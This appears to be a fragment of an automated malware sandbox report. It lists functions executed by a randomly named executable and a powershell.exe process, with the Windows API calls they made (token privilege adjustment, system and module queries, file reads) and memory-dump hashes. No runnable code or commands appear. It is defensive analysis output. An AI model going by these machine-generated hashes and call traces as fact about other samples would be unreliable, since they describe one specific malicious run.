                                                                                            • Instruction ID: 3c7b391c58419577da21966c53437186f3abb359b41ed603ee51281f73dced1b
                                                                                            • Opcode Fuzzy Hash: 2f11b639db8f9cd4440aebe9456e13e08272f128bb9eefc9e283e19c2d3d0734
                                                                                            • Instruction Fuzzy Hash: A411A3715093809FD711CF25DC49B96FFA4DF02260F0980EBED458B262D275A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0074A9C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 397a55ac38400a209f3164585f0646e2e679f0cb52eb63351be8f441178c59b3
                                                                                            • Instruction ID: d6f58369abbc60d5dc30924ef9f16272562620676d13d8b4185ca8f30ccdbba2
                                                                                            • Opcode Fuzzy Hash: 397a55ac38400a209f3164585f0646e2e679f0cb52eb63351be8f441178c59b3
                                                                                            • Instruction Fuzzy Hash: 23018F75604640EFEB10DF25D8897A6FB94DF04360F18C4ABDD098B652D779A804CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02990681, Relevance: .2, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2135621233.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1f4df18412648b210627318bdadb035cd028805a56eab4f788c6f7a797b2c7f
                                                                                            • Instruction ID: eab5d7921397ab9414f2c8fe4ef01f140d6a02f579d927af32cd26a3627cd647
                                                                                            • Opcode Fuzzy Hash: e1f4df18412648b210627318bdadb035cd028805a56eab4f788c6f7a797b2c7f
                                                                                            • Instruction Fuzzy Hash: 4331404968E3D24FD7138B781CBA4A5BFB09D0316075E82DBD8D0CF4E3C649981AE362
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02990811, Relevance: .1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2135621233.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4e7884a1040d71671054f7c3bef787bb264d5cfef97b6b13622b8d10d42369ce
                                                                                            • Instruction ID: cd863332a6467cfe137b9547abdfaa9d6d49c02c6f9f374796cead3193f58013
                                                                                            • Opcode Fuzzy Hash: 4e7884a1040d71671054f7c3bef787bb264d5cfef97b6b13622b8d10d42369ce
                                                                                            • Instruction Fuzzy Hash: 8D01DD6628E3D04FC303837868BA5A57FB28E43125B0E80DBD4C0CF1A3C64D481AD762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007423F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128082232.0000000000742000.00000040.00000001.sdmp, Offset: 00742000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ae8f2602036696502e52082a01f5306b295bc0f776e897731e9eeacbc93fe53
                                                                                            • Instruction ID: 0da003f89a1d7ad2febddc1a6c22e0f2d5ad4d862eb2b8ee762dc80a313b3406
                                                                                            • Opcode Fuzzy Hash: 6ae8f2602036696502e52082a01f5306b295bc0f776e897731e9eeacbc93fe53
                                                                                            • Instruction Fuzzy Hash: E1D05E79304AC18FD7168A1CC1A8BA53794AF55B04F9644F9F840CB6A3C768ED92D200
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007423BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128082232.0000000000742000.00000040.00000001.sdmp, Offset: 00742000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 967abbce7e38e908e87e5af77c3abba216bf5dc6acf116dffbf6bcc6f7943e46
                                                                                            • Instruction ID: 1cf695e773eef340b6ab8151b17b5cc3c031609f6092742ba450bc6eea011fa4
                                                                                            • Opcode Fuzzy Hash: 967abbce7e38e908e87e5af77c3abba216bf5dc6acf116dffbf6bcc6f7943e46
                                                                                            • Instruction Fuzzy Hash: 1DD052343006818FDB2ACE1CC294F5973E8AF80B00F4644E8BC108B266C3ACEC92CA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 1888 Parent PID: 1388 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 003C1888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 003C18A8
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 003C18BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.2168418442.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: eb53e87337deb2b2a2c0dee4e1e5ae135cf5256a74297db762cff84031acdb9f
                                                                                            • Instruction ID: b4416e654ab210fd49fd87c319c1847ef13637c9dcb816033a6fbdf410c9bdfe
                                                                                            • Opcode Fuzzy Hash: eb53e87337deb2b2a2c0dee4e1e5ae135cf5256a74297db762cff84031acdb9f
                                                                                            • Instruction Fuzzy Hash: 08E09A74D04308DFC784EFB8E94865A7BF5B749300B1065A9C909E7354E7705951CFB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0027D01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.2167904228.000000000027D000.00000040.00000001.sdmp, Offset: 0027D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 561d0b2d2ae2ee6771789d0dcb78d6253818762d5e3adcdc0f4811a0946c41d5
                                                                                            • Instruction ID: f4f6350693ddb2ec2b518c76d19241dbc05d13e563621f61a2b64cd66ce5d034
                                                                                            • Opcode Fuzzy Hash: 561d0b2d2ae2ee6771789d0dcb78d6253818762d5e3adcdc0f4811a0946c41d5
                                                                                            • Instruction Fuzzy Hash: 5E21F275614204DFCB14DF24D984B16BBB5EF84314F24C969D80D4B246C37AD827CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0027D006, Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000013.00000002.2167904228.000000000027D000.00000040.00000001.sdmp, Offset: 0027D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 583c2982c4f4b2185633f4c0cca4dd7d8db8b088ea30518aa7a419d87303fee3
                                                                                            • Instruction ID: 36cb8e9b5a67d716f88206ac450f5a58c4f2b446698ebdfc585504d182c2c80e
                                                                                            • Opcode Fuzzy Hash: 583c2982c4f4b2185633f4c0cca4dd7d8db8b088ea30518aa7a419d87303fee3
                                                                                            • Instruction Fuzzy Hash: C2215B755093808FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A981ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 1836 Parent PID: 2900 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0058ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0058AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 5d7be0cf46ac6bf85bd1d6439adf5fca48d3f7fd8d81de85120560e18657493a
                                                                                            • Instruction ID: 147d4f2c6b2a93a1cc61601621350c51e1fa0d551b7c965fc2c68cbc1da52702
                                                                                            • Opcode Fuzzy Hash: 5d7be0cf46ac6bf85bd1d6439adf5fca48d3f7fd8d81de85120560e18657493a
                                                                                            • Instruction Fuzzy Hash: E6219F765097849FEB228F25DC44B92BFF4EF16310F08849BE985CB563D271A908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0058AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 32948c8334cd56d3b1d84628c0bfa152ba00629536289e1552528e91a20ebfdf
                                                                                            • Instruction ID: 2eaf32365120b8af3f7043ff8f2989a303e57fe789935fa4b050658dec5231d8
                                                                                            • Opcode Fuzzy Hash: 32948c8334cd56d3b1d84628c0bfa152ba00629536289e1552528e91a20ebfdf
                                                                                            • Instruction Fuzzy Hash: B2118C765006009FEB219F55D884B56FFE4FB04321F08846AED49CAA62D331E814DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0058B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: ef793c5ae34cbcd155030a745f89e2a11356f23c5820930d9dff6a584d7963dc
                                                                                            • Instruction ID: 1de9010bf934b280989f9948ea2b05dc7fb82ccaa6ae47ee7cea930b4822da53
                                                                                            • Opcode Fuzzy Hash: ef793c5ae34cbcd155030a745f89e2a11356f23c5820930d9dff6a584d7963dc
                                                                                            • Instruction Fuzzy Hash: 2111E071008380AFDB228F11DC45F52FFB4EF06320F08848EED844B263C275A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0058B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: dfc302b170f1997ef10143eecf241ec4d59a6b5a08d78752e46f5c77a05bfcf2
                                                                                            • Instruction ID: f1e54b25467e11afd2cbc3dffa5441c26b868509920591b2c373a0d732ebb861
                                                                                            • Opcode Fuzzy Hash: dfc302b170f1997ef10143eecf241ec4d59a6b5a08d78752e46f5c77a05bfcf2
                                                                                            • Instruction Fuzzy Hash: F201AD31400740DFEB20AF09D885B26FFA4FF18721F18C89ADD495B612D771A418DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: a21015f5960ec9b849f3ceccec7b66faa6dbe63192a6cca4c7d7aec16a1d97e3
                                                                                            • Instruction ID: 55f648e5fa4619010f668bab242883bd65662419a97fecc85a80ae25bdbab8cc
                                                                                            • Opcode Fuzzy Hash: a21015f5960ec9b849f3ceccec7b66faa6dbe63192a6cca4c7d7aec16a1d97e3
                                                                                            • Instruction Fuzzy Hash: B6314A7650E3C08FEB138B759C65692BFB4AF43214F0E84DBD884CF1A3D6259809D762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: d58d5ede188fc3112783622c803042ad9846e09ccefe97a7888d40a199bb9f1e
                                                                                            • Instruction ID: 672a79bbda1b7ca09bb044b786a8810d398440fd81679162af6f8d4334efacdc
                                                                                            • Opcode Fuzzy Hash: d58d5ede188fc3112783622c803042ad9846e09ccefe97a7888d40a199bb9f1e
                                                                                            • Instruction Fuzzy Hash: 10316271509384AFEB22CF65CC85F56BFF8EF05214F09849EE9858B292D375E908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 68f8d17a1a5d365b2895d9648701820a88d74c6da7aaec03f8ee2f52e6cdb606
                                                                                            • Instruction ID: 619adb3807461ad8fcb5af28a9e41014f0f860b9f93cf554af115b1c2d2c659b
                                                                                            • Opcode Fuzzy Hash: 68f8d17a1a5d365b2895d9648701820a88d74c6da7aaec03f8ee2f52e6cdb606
                                                                                            • Instruction Fuzzy Hash: 2C31C5B1509380AFE712CB25DC45B96BFE8DF06214F0884AAE984CF293D375A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 0058BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 32c74662009a53ec06998932fb818f2b9db08c58cf134bca85b8b77bfd7a4195
                                                                                            • Instruction ID: 93592b40fe497a8e798aca61dd6300b688efcd9d2092e4d5a538e1127732343c
                                                                                            • Opcode Fuzzy Hash: 32c74662009a53ec06998932fb818f2b9db08c58cf134bca85b8b77bfd7a4195
                                                                                            • Instruction Fuzzy Hash: 6D31B471009380AFE712CB60CC45F97BFBCEF06310F08849BE984DB192D224A909C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 0058AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 667d70b8ef8d5d227f1647af8e3e5acda4e62acd27c793c1cd367bede3983ce7
                                                                                            • Instruction ID: 608e9f20860d43223273a75e07d8c25007a4dcb9a824df5e7609ae787ed72713
                                                                                            • Opcode Fuzzy Hash: 667d70b8ef8d5d227f1647af8e3e5acda4e62acd27c793c1cd367bede3983ce7
                                                                                            • Instruction Fuzzy Hash: 9621D8B2509380AFE712CF61DC45B96BFB8EF06320F1884DBE984DB193D2659945C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 0032cb72d6cb4d4d0369250ad063707b8f5a14d853b219988b1e67fef662d7bc
                                                                                            • Instruction ID: 4fe38c3fb8839d4f1115cb8a9630e76935b2cc072716d0ee4e82088aa2626f16
                                                                                            • Opcode Fuzzy Hash: 0032cb72d6cb4d4d0369250ad063707b8f5a14d853b219988b1e67fef662d7bc
                                                                                            • Instruction Fuzzy Hash: 383171B550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 0058B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 6005da62a83a18aa7df5120c80bf60b3401be052ea313db84559a8e716078426
                                                                                            • Instruction ID: 3b666e5a898b86dbf13b5af0ecdd2d228f502e5e4ab51fe67785d85fc26ab813
                                                                                            • Opcode Fuzzy Hash: 6005da62a83a18aa7df5120c80bf60b3401be052ea313db84559a8e716078426
                                                                                            • Instruction Fuzzy Hash: 6F217171509380EFE722CF15DC45FA7BFACEF46320F08849AE945DB192D664E948CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0058A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 96374c0f6867b787793a70e9a70414aa1669b07c71e8f97f9fbe9658e5ea4c30
                                                                                            • Instruction ID: 4e624441d69484805a4e0ff6751605e6f1b991d023d66a94d43ed363d7968a2d
                                                                                            • Opcode Fuzzy Hash: 96374c0f6867b787793a70e9a70414aa1669b07c71e8f97f9fbe9658e5ea4c30
                                                                                            • Instruction Fuzzy Hash: 7E21C47140D3C06FD3128B258C55B66FFB4EF47620F1981DBE884CF293D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 02770819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 8a134575cc8ee220073637d0986831e6210c93ab7228bae7b59469962e36ef5a
                                                                                            • Instruction ID: edba4fff8d02dd050014ecaed5f6c6e31cbfca31335c156740698d3a8811bbbd
                                                                                            • Opcode Fuzzy Hash: 8a134575cc8ee220073637d0986831e6210c93ab7228bae7b59469962e36ef5a
                                                                                            • Instruction Fuzzy Hash: 5621DAB6408780AFE712CB159C45FA3BFA8EF46724F1981DBF9848B193D224A905C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 0d1b8107d3e960729dd30f150953fcd876d2f63b4b2c39ba6e88e3bb55b73411
                                                                                            • Instruction ID: a3fb2c5eb6d9d9ddd66eb322d775c7db1b912e4935c1047231fbf4c3a42f60f3
                                                                                            • Opcode Fuzzy Hash: 0d1b8107d3e960729dd30f150953fcd876d2f63b4b2c39ba6e88e3bb55b73411
                                                                                            • Instruction Fuzzy Hash: 32216D7540E3C0AFD7128B258C55B62BFB4EF47610F1A81CBD8848F6A3D225A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: f9a258eadb522fdc195d203b44d7ab53abfdd917ed50c0f93eef2ab724fa1695
                                                                                            • Instruction ID: f9727bbce99f586aa54cb1941d9a39097555b46d8d03e3bcd3dd0c8cecf202d8
                                                                                            • Opcode Fuzzy Hash: f9a258eadb522fdc195d203b44d7ab53abfdd917ed50c0f93eef2ab724fa1695
                                                                                            • Instruction Fuzzy Hash: 56219D71500704EFEB21DF65CC85F66FBE8EF08650F14846EE9899B292D771E904CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 027708E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 05323e4075efb1ce050afe8c4d1b9f67c7c61a26c09be863ecd5ed5a64d9f107
                                                                                            • Instruction ID: 2428bde71a30c9648bee5cddefb2925cd1642715138abfed3ac23f5848ef520e
                                                                                            • Opcode Fuzzy Hash: 05323e4075efb1ce050afe8c4d1b9f67c7c61a26c09be863ecd5ed5a64d9f107
                                                                                            • Instruction Fuzzy Hash: 4E219271409380AFEB22CF61DC45F56BFB8EF06314F09849BE9449B193C265A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0058A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 7e943f60ebc09119c2fb1f22c5e6faaa3f46cca139d679c247fcdc41cd5d0a5f
                                                                                            • Instruction ID: 52e4bf0e0e6ee364006e8c996bc6ef16c599f4c5e16f0c4a65b896e505271f7b
                                                                                            • Opcode Fuzzy Hash: 7e943f60ebc09119c2fb1f22c5e6faaa3f46cca139d679c247fcdc41cd5d0a5f
                                                                                            • Instruction Fuzzy Hash: 5921A77540D780AFD3138B25DC51B62BFB4EF87710F1981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2154362954.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 5b052017520d119fbc49f98015730067c6c2f98dbd08bbf25c3d80ab2f302fd5
                                                                                            • Instruction ID: b33f53fc8f0589c2fe11261c00d0ff28c5484b698591f788f2bf649b6f20660e
                                                                                            • Opcode Fuzzy Hash: 5b052017520d119fbc49f98015730067c6c2f98dbd08bbf25c3d80ab2f302fd5
                                                                                            • Instruction Fuzzy Hash: CA21AEB1600300AFFB20DF25CC85BA6FBD8EF04214F14846AE848DB282D775F804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 0058BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: c62b39183b7dc3c511bc075ed66e81cf9d8c3c59a432d24ba081b68f58cf2c29
                                                                                            • Instruction ID: d91259a1abd1bfb98d24647aa62bb94ba977a8ec383d19a43a32fb6e2d4c3ea1
                                                                                            • Opcode Fuzzy Hash: c62b39183b7dc3c511bc075ed66e81cf9d8c3c59a432d24ba081b68f58cf2c29
                                                                                            • Instruction Fuzzy Hash: E1118C72500204EFFB21DF55DC85BAAFBACEF04320F14896AED45DA141D670A9048BA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0058B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F26FF6AC,00000000,00000000,00000000,00000000), ref: 0058B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000014.00000002.2141978515.000000000058A000.00000040.00000001.sdmp, Offset: 0058A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 42f5aae2963efaec90c328f5db09e6bba4b65cc3213aa12a958a511b7901e882
                                                                                            • Instruction ID: f3ea076af2dce4848ab8ecc7c02b99acb217ad8d3d878b41e47883faee35f9b2
